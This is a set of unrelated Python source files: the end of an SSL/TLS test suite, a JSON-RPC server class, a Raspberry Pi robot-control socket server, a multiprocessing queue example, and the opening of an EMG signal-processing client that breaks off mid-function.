self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
asyncore.loop(0.05)
def stop(self):
self.active = False
self.server.close()
class SocketServerHTTPSServer(threading.Thread):
class HTTPSServer(HTTPServer):
def __init__(self, server_address, RequestHandlerClass, certfile):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
# we assume the certfile contains both private key and certificate
self.certfile = certfile
self.allow_reuse_address = True
def __str__(self):
return ('<%s %s:%s>' %
(self.__class__.__name__,
self.server_name,
self.server_port))
def get_request(self):
# override this to wrap socket with SSL
sock, addr = self.socket.accept()
sslconn = ssl.wrap_socket(sock, server_side=True,
certfile=self.certfile)
return sslconn, addr
class RootedHTTPRequestHandler(SimpleHTTPRequestHandler):
# need to override translate_path to get a known root,
# instead of using os.curdir, since the test could be
# run from anywhere
server_version = "TestHTTPS/1.0"
root = None
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = urlparse.urlparse(path)[2]
path = os.path.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in self.root: continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
# we override this to suppress logging unless "verbose"
if test_support.verbose:
sys.stdout.write(" server (%s:%d %s):\n [%s] %s\n" %
(self.server.server_address,
self.server.server_port,
self.request.cipher(),
self.log_date_time_string(),
format%args))
def __init__(self, certfile):
self.flag = None
self.RootedHTTPRequestHandler.root = os.path.split(CERTFILE)[0]
self.server = self.HTTPSServer(
(HOST, 0), self.RootedHTTPRequestHandler, certfile)
self.port = self.server.server_port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
if self.flag:
self.flag.set()
self.server.serve_forever(0.05)
def stop(self):
self.server.shutdown()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False)
with server:
try:
s = ssl.wrap_socket(socket.socket(),
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError, x:
if test_support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x[1])
except socket.error, x:
if test_support.verbose:
sys.stdout.write("\nsocket.error is %s\n" % x[1])
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(certfile, protocol, certreqs, cacertsfile,
client_certfile, client_protocol=None, indata="FOO\n",
ciphers=None, chatty=True, connectionchatty=False,
wrap_accepting_socket=False):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
server = ThreadedEchoServer(certfile,
certreqs=certreqs,
ssl_version=protocol,
cacerts=cacertsfile,
ciphers=ciphers,
chatty=chatty,
connectionchatty=connectionchatty,
wrap_accepting_socket=wrap_accepting_socket)
with server:
# try to connect
if client_protocol is None:
client_protocol = protocol
s = ssl.wrap_socket(socket.socket(),
certfile=client_certfile,
ca_certs=cacertsfile,
ciphers=ciphers,
cert_reqs=certreqs,
ssl_version=client_protocol)
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(arg)))
s.write(arg)
outdata = s.read()
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
raise AssertionError(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if connectionchatty:
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def try_protocol_combo(server_protocol,
client_protocol,
expect_success,
certsreqs=None):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if test_support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
try:
# NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
# will send an SSLv3 hello (rather than SSLv2) starting from
# OpenSSL 1.0.0 (see issue #8322).
server_params_test(CERTFILE, server_protocol, certsreqs,
CERTFILE, CERTFILE, client_protocol,
ciphers="ALL", chatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an IOError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = test_support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
s.accept()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
c = socket.socket()
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except IOError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_TLSv1, ssl.CERT_NONE,
CERTFILE, CERTFILE, ssl.PROTOCOL_TLSv1,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if test_support.verbose:
sys.stdout.write("\n")
s2 = socket.socket()
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_SSLv23,
cacerts=CERTFILE,
chatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=ssl.PROTOCOL_SSLv23)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if test_support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
s.close()
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
if not hasattr(ssl, 'PROTOCOL_SSLv2'):
self.skipTest("PROTOCOL_SSLv2 needed")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if test_support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = ("msg 1", "MSG 2", "STARTTLS", "MSG 3", "msg 4", "ENDTLS", "msg 5", "msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if test_support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % repr(indata))
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
if (indata == "STARTTLS" and
outdata.strip().lower().startswith("ok")):
# STARTTLS ok, switch to secure mode
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, starting TLS...\n"
% repr(outdata))
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif (indata == "ENDTLS" and
outdata.strip().lower().startswith("ok")):
# ENDTLS ok, switch back to clear text
if test_support.verbose:
sys.stdout.write(
" client: read %s from server, ending TLS...\n"
% repr(outdata))
s = conn.unwrap()
wrapped = False
else:
if test_support.verbose:
sys.stdout.write(
" client: read %s from server\n" % repr(outdata))
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write("over\n")
else:
s.send("over\n")
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = SocketServerHTTPSServer(CERTFILE)
flag = threading.Event()
server.start(flag)
# wait for it to start
flag.wait()
# try to connect
try:
if test_support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://127.0.0.1:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
with test_support.check_py3k_warnings():
f = urllib.urlopen(url)
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if test_support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
f.close()
self.assertEqual(d1, d2)
finally:
server.stop()
server.join()
def test_wrapped_accept(self):
"""Check the accept() method on SSL sockets."""
if test_support.verbose:
sys.stdout.write("\n")
server_params_test(CERTFILE, ssl.PROTOCOL_SSLv23, ssl.CERT_REQUIRED,
CERTFILE, CERTFILE, ssl.PROTOCOL_SSLv23,
chatty=True, connectionchatty=True,
wrap_accepting_socket=True)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if test_support.verbose:
sys.stdout.write("\n")
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if test_support.verbose:
sys.stdout.write(
" client: sending %s...\n" % (repr(indata)))
s.write(indata)
outdata = s.read()
if test_support.verbose:
sys.stdout.write(" client: read %s\n" % repr(outdata))
if outdata != indata.lower():
self.fail(
"bad data <<%s>> (%d) received; expected <<%s>> (%d)\n"
% (outdata[:min(len(outdata),20)], len(outdata),
indata[:min(len(indata),20)].lower(), len(indata)))
s.write("over\n")
if test_support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
def test_recv_send(self):
"""Test recv(), send() and friends."""
if test_support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray("\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray("\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = data_prefix + meth_name
try:
send_meth(indata.encode('ASCII', 'strict'), *args)
outdata = s.read()
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While sending with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = data_prefix + meth_name
try:
s.send(indata.encode('ASCII', 'strict'))
outdata = recv_meth(*args)
outdata = outdata.decode('ASCII', 'strict')
if outdata != indata.lower():
self.fail(
"While receiving with <<%s>> bad data "
"<<%r>> (%d) received; "
"expected <<%r>> (%d)\n" % (
meth_name, outdata[:20], len(outdata),
indata[:20], len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<%s>>; "
"expected to succeed.\n" % (meth_name,)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<%s>> failed with unexpected "
"exception message: %s\n" % (
meth_name, e
)
)
# consume data
s.read()
s.write("over\n".encode("ASCII", "strict"))
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = test_support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c = ssl.wrap_socket(c)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_default_ciphers(self):
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
sock = socket.socket()
try:
# Force a set of weak ciphers on our client socket
try:
s = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_SSLv23,
ciphers="DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with self.assertRaises((OSError, ssl.SSLError)):
s.connect((HOST, server.port))
finally:
sock.close()
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_main(verbose=False):
global CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, NOKIACERT, NULLBYTECERT
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
    # Pyston change: the bundled CA file for svn.python.org seems to be invalid now,
    # so use the system's root CA bundle temporarily.
# SVN_PYTHON_ORG_ROOT_CERT = os.path.join(
# os.path.dirname(__file__) or os.curdir,
# "https_svn_python_org_root.pem")
SVN_PYTHON_ORG_ROOT_CERT = '/etc/ssl/certs/ca-certificates.crt'
NOKIACERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nokia.pem")
NULLBYTECERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nullbytecert.pem")
if (not os.path.exists(CERTFILE) or
not os.path.exists(SVN_PYTHON_ORG_ROOT_CERT) or
not os.path.exists(NOKIACERT) or
not os.path.exists(NULLBYTECERT)):
raise test_support.TestFailed("Can't read certificate files!")
tests = [BasicTests, BasicSocketTests]
if test_support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = test_support.threading_setup()
if thread_info and test_support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
test_support.run_unittest(*tests)
finally:
if _have_threads:
test_support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server26.py
|
# -*- coding: utf-8 -*-
import json
import select
import threading
import SocketServer
from server_common import (SimpleJSONRPCDispatcher,
SimpleJSONRPCRequestHandler)
class SimpleJSONRPCServer(SocketServer.TCPServer,
SimpleJSONRPCDispatcher):
"""Simple JSON-RPC server.
Simple JSON-RPC server that allows functions and a single instance
to be installed to handle requests. The default implementation
attempts to dispatch JSON-RPC calls to the functions or instance
    installed in the server. Override the _dispatch method inherited
from SimpleJSONRPCDispatcher to change this behavior.
"""
allow_reuse_address = True
def __init__(self, addr, requestHandler=SimpleJSONRPCRequestHandler,
logRequests=True):
self.logRequests = logRequests
SimpleJSONRPCDispatcher.__init__(self, allow_none=True, encoding=None)
SocketServer.TCPServer.__init__(self, addr, requestHandler)
self.__thread = None
def serve_forever(self, in_thread=False, poll_interval=0.5):
def serve_thread(server, poll_interval):
server.serve_forever(poll_interval=poll_interval)
if in_thread:
args = [self, poll_interval]
self.__thread = threading.Thread(target=serve_thread, args=args)
self.__thread.setDaemon(True)
self.__thread.start()
else:
SocketServer.TCPServer.serve_forever(self, poll_interval)
def shutdown(self, immediately = True):
if not immediately:
self._BaseServer__serving = False
return
SocketServer.TCPServer.shutdown(self)
if self.__thread:
self.__thread.join()
self.__thread = None
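# Minimal usage sketch (placeholder address and function). register_function()
# is assumed to be provided by SimpleJSONRPCDispatcher from server_common,
# mirroring the standard SimpleXMLRPCDispatcher API:
#
#   server = SimpleJSONRPCServer(("127.0.0.1", 8080))
#   server.register_function(pow)
#   server.serve_forever(in_thread=True)  # serve from a background thread
#   ...
#   server.shutdown()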
|
server-tad-pi-v2.py
|
import socket
from multiprocessing import Process, Manager
import time
import sys
import RPi.GPIO as GPIO
import os
'''
!!!THIS IS FOR LOCALHOST TESTING!!!
Written by Gunnar Bjorkman to control a robot via a Raspberry Pi
Current design:
* Receive the client's inputs and send server/robot info to the client over a socket
connection.
* Controls ESCs and servos that are plugged into the GPIO ports on the
raspberrypi.
* Uses TCP bi-directional connection (both server and client can send and
receive data).
* Multiprocessing so the server can listen for messages and control the
robot simultaneously.
Copy file over ssh to raspberrypi:
scp {PATH TO THIS} pi@raspberrypi:~/Desktop/
*** this exact command is for my computer only, use: ***
scp ~/Documents/Code/python/gunn-pi/{THIS}.py pi@raspberrypi:~/Desktop/
'''
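# Wire format expected from the client (inferred from messageCatcher() below),
# values space separated and the message terminated with ';':
#   "data: <x_axis> <y_axis> <z_axis> <switch_axis> <button_11> <button_12>;"
# e.g. "data: 0.12 -0.40 0.00 1.00 0 1;"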
### Server Stuff
SERVER = "192.168.0.197" # 169.254.209.111
PORT = 6762
s = socket.socket()
s.bind((SERVER, PORT))
s.listen(1024)
def messageCatcher(inputs, _):
while True:
c, addr = s.accept() # Establish connection with client.
try:
print 'client connected:'+str(addr)
while True:
data = c.recv(1024)
#print data
if data.startswith("data:"):
data, _ = data.split(';', 1)
_, x_axis, y_axis, z_axis, switch_axis, button_11, button_12 = data.split()
inputs['x_axis'] = float(x_axis)
inputs['y_axis'] = float(y_axis)
inputs['z_axis'] = float(z_axis)
inputs['switch_axis'] = float(switch_axis)
inputs['button_11'] = int(button_11)
inputs['button_12'] = int(button_12)
c.sendall("battery:"+str(inputs['battery'])+";")
if data:
c.sendall('ping;')
else:
print 'Connection died'
break
finally:
c.close()
def mainProcess(inputs, _):
### Variables global to the main process
# Base Control
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT) # motor 1
GPIO.setup(18, GPIO.OUT) # motor 2
GPIO.setup(27, GPIO.OUT) # motor 3
GPIO.setup(22, GPIO.OUT) # motor 4
GPIO.setup(23, GPIO.OUT) # motor lift
GPIO.setup(24, GPIO.OUT) # motor sweep
GPIO.setup(25, GPIO.OUT) # servo hatch
m1 = GPIO.PWM(17, 50)
m2 = GPIO.PWM(18, 50)
m3 = GPIO.PWM(27, 50)
m4 = GPIO.PWM(22, 50)
mL = GPIO.PWM(23, 50)
mS = GPIO.PWM(24, 50)
sH = GPIO.PWM(25, 50)
m1.start(7)
m2.start(7)
m3.start(7)
m4.start(7)
mL.start(7)
mS.start(7)
sH.start(7)
m1_prev_duty = 7
m2_prev_duty = 7
m3_prev_duty = 7
m4_prev_duty = 7
mL_prev_duty = 7
mS_prev_duty = 7
sH_prev_duty = 7
# Zeroes out inputs within the dead-zone threshold and rescales the remaining
# range back to its corresponding -1 through 1 values, rounded to two decimals.
#
# Only useful for analog/axial inputs
def inputFilter(x):
thresh_hold = 0.1
if x < 0:
thresh_hold = -thresh_hold
x = min(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
else:
x = max(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
return round(x, 2)
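# Worked examples for the dead-zone filter above (threshold 0.1):
#   inputFilter(0.05) -> 0.0   (inside the dead zone)
#   inputFilter(0.55) -> 0.5   ((0.55 - 0.1) / 0.9, rounded)
#   inputFilter(-1.0) -> -1.0  (full deflection is preserved)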
while True:
# Filter the inputs through 'inputFilter()'
x_axis = -1 * inputFilter(inputs['x_axis'])
y_axis = -1 * inputFilter(inputs['y_axis'])
z_axis = -1 * inputFilter(inputs['z_axis'])
switch_axis = inputFilter(inputs['switch_axis'])
print(x_axis)
print(y_axis)
print(z_axis)
print(switch_axis)
horizontal_power = (x_axis * 4) + 7
vertical_power = (y_axis * 4) + 7
print("longitudinal movement: " + str(vertical_power))
print("strafe movement: " + str(horizontal_power))
print(" ")
# Mecanum-Wheel equation
m1_duty_cycle = min(11, max(3, ((y_axis - x_axis - z_axis) * 4) + 7))
m3_duty_cycle = min(11, max(3, ((y_axis - x_axis + z_axis) * 4) + 7))
m2_duty_cycle = min(11, max(3, ((y_axis + x_axis - z_axis) * 4) + 7))
m4_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
# Omni-Wheel equation
# m1_duty_cycle = min(11, max(3, (-1 * (x_axis - (-1 * z_axis)) * 4) + 7))
# m3_duty_cycle = min(11, max(3, ( 1 * (x_axis + (-1 * z_axis)) * 4) + 7))
# m2_duty_cycle = min(11, max(3, (-1 * (y_axis - (-1 * z_axis)) * 4) + 7))
# m4_duty_cycle = min(11, max(3, ( 1 * (y_axis + (-1 * z_axis)) * 4) + 7))
# Lift speed
mL_duty_cycle = min(11, max(3, ((switch_axis) * 4) + 7))
# Sweeper drum speed
mS_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
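# Worked example: full forward (y_axis = 1, x_axis = z_axis = 0) maps to a duty
# cycle of (1 * 4) + 7 = 11 on every drive motor, full reverse maps to 3, and
# centred sticks stay at the neutral value of 7, matching the 3..11 clamp above.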
print("Motor 1: " + str(m1_duty_cycle))
print("Motor 2: " + str(m2_duty_cycle))
print("Motor 3: " + str(m3_duty_cycle))
print("Motor 4: " + str(m4_duty_cycle))
if horizontal_power > 10:
inputs['battery'] = 1
print 'battery = 1'
else:
inputs['battery'] = 0
print 'battery = 0'
if m1_prev_duty != m1_duty_cycle:
m1.ChangeDutyCycle(m1_duty_cycle)
m1_prev_duty = m1_duty_cycle
print 'm1 change'
if m2_prev_duty != m2_duty_cycle:
m2.ChangeDutyCycle(m2_duty_cycle)
m2_prev_duty = m2_duty_cycle
print 'm2 change'
if m3_prev_duty != m3_duty_cycle:
m3.ChangeDutyCycle(m3_duty_cycle)
m3_prev_duty = m3_duty_cycle
print 'm3 change'
if m4_prev_duty != m4_duty_cycle:
m4.ChangeDutyCycle(m4_duty_cycle)
m4_prev_duty = m4_duty_cycle
print 'm4 change'
if mL_prev_duty != mL_duty_cycle:
mL.ChangeDutyCycle(mL_duty_cycle)
mL_prev_duty = mL_duty_cycle
print 'mL change'
if mS_prev_duty != mS_duty_cycle:
mS.ChangeDutyCycle(mS_duty_cycle)
mS_prev_duty = mS_duty_cycle
print 'mS change'
#sH.ChangeDutyCycle(sH_duty_cycle)
#m1.ChangeDutyCycle(horizontal_power) # between 2.5 & 12.5
time.sleep(0.05)
os.system('clear') # Clear screen for Mac and Linux
if __name__ == "__main__":
manager = Manager()
inputs = manager.dict()
inputs['x_axis'] = 0
inputs['y_axis'] = 0
inputs['z_axis'] = 0
inputs['switch_axis'] = 0
inputs['battery'] = 0
# - multiprocessing runs a separate instance of python, typical
# global variables are not shared between child processes
mC = Process(target=messageCatcher, args=(inputs, 1))
mP = Process(target=mainProcess, args=(inputs, 1))
mC.start()
mP.start()
mC.join()
mP.join()
|
queue_order.py
|
#!/usr/bin/python
from multiprocessing import Process, Queue
import time
import random
# This example demonstrates how to recover the correct order of the
# results computed from the input data.
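# e.g. for data = [2, 4, 6, 3, 5, 8, 9, 7] the printed result is
# [4, 16, 36, 9, 25, 64, 81, 49] (the squares in the original input order)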
def square(idx, x, queue):
time.sleep(random.randint(1, 3))
queue.put((idx, x * x))
def main():
data = [2, 4, 6, 3, 5, 8, 9, 7]
queue = Queue()
processes = [Process(target=square, args=(idx, val, queue))
for idx, val in enumerate(data)]
for p in processes:
p.start()
for p in processes:
p.join()
unsorted_result = [queue.get() for _ in processes]
result = [val[1] for val in sorted(unsorted_result)]
print(result)
if __name__ == '__main__':
main()
|
udpclientv2.py
|
import socket
import sys
import time
import serial
import threading
import numpy as np
from scipy import signal
from scipy.signal import lfilter , iirnotch , butter , filtfilt , medfilt
import csv
writeToFile = True
read = True
def process():
global strm,m1p,m2p,m3p,m4p,o1p,o2p,o3p,o4p,win,cnt
if strm >= 100:
normalize()
remove_artifacts()
samp = str(win)+","+str(int(rms(m1p)))+","+str(int(rms(m2p)))+","+str(int(rms(m3p)))+","+str(int(rms(m4p)))+"\n"
print(samp)
return samp
else:
return "Null"
return
def rms(x):
return np.sqrt(x.dot(x)/x.size)
def normalize():
global m1 , m2 , m3 , m4
m1[:win] = m1[:win] - np.mean(m1[:win])
m2[:win] = m2[:win] - np.mean(m2[:win])
